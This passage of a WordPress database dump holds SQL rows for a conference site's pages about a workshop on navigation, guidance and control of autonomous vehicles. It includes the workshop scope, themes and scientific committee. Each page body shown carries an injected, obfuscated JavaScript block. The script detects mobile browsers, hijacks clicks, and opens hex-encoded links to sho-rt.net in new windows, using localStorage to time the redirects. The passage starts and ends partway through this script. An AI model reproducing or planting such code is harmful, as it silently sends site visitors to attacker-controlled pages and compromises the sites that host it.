_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr. Sidney Givigi','','publish','closed','closed','','dr-sidney-givigi','','','2022-10-14 22:36:03','2022-10-14 22:36:03','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2864',0,'dt_team','',0),
(2865,1,'2022-10-14 22:35:00','2022-10-14 22:35:00','','w162','','inherit','open','closed','','w162','','','2022-10-14 22:35:00','2022-10-14 22:35:00','',2864,'https://gsw2023.com/wp-content/uploads/2022/10/w162.jpg',0,'attachment','image/jpeg',0),
(2866,1,'2022-10-14 22:36:25','2022-10-14 22:36:25','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n<p>[/vc_column_text][vc_column_text]</p>\n<h6 style=\"text-align:justify; color:black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2860\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:Blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Cairo Lúcio Nascimento Junior, ITA, Brazil</strong></h6>\n</li>\n<li>\n<h6><strong>Peter Travis Jardine, Royal Military College of Canada, ON, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Tamazin, Orolia, Montreal, QC, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Paul Hershey, Raytheon, USA (I still need to confirm with him)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Technologies Inc.</strong></h6>\n</li>\n<li>\n<h6><strong>Caroline Channel, ISAE-Supaero, France</strong></h6>\n</li>\n<li>\n<h6><strong>Ashraf Abosekeen, Military Technical College, Cairo, Egypt.</strong></h6>\n</li>\n<li>\n<h6><strong>Umar Iqbal, Mississippi State University, USA</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2022-10-14 22:36:25','2022-10-14 22:36:25','',2856,'https://gsw2023.com/?p=2866',0,'revision','',0),
(2867,1,'2022-10-14 22:37:10','2022-10-14 22:37:10','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n<p>[/vc_column_text][vc_column_text]</p>\n<h6 style=\"text-align:justify; color:black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2860\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:Blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Cairo Lúcio Nascimento Junior, ITA, Brazil</strong></h6>\n</li>\n<li>\n<h6><strong>Peter Travis Jardine, Royal Military College of Canada, ON, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Tamazin, Orolia, Montreal, QC, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Paul Hershey, Raytheon, USA (I still need to confirm with him)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Technologies Inc.</strong></h6>\n</li>\n<li>\n<h6><strong>Caroline Channel, ISAE-Supaero, France</strong></h6>\n</li>\n<li>\n<h6><strong>Ashraf Abosekeen, Military Technical College, Cairo, Egypt.</strong></h6>\n</li>\n<li>\n<h6><strong>Umar Iqbal, Mississippi State University, USA</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 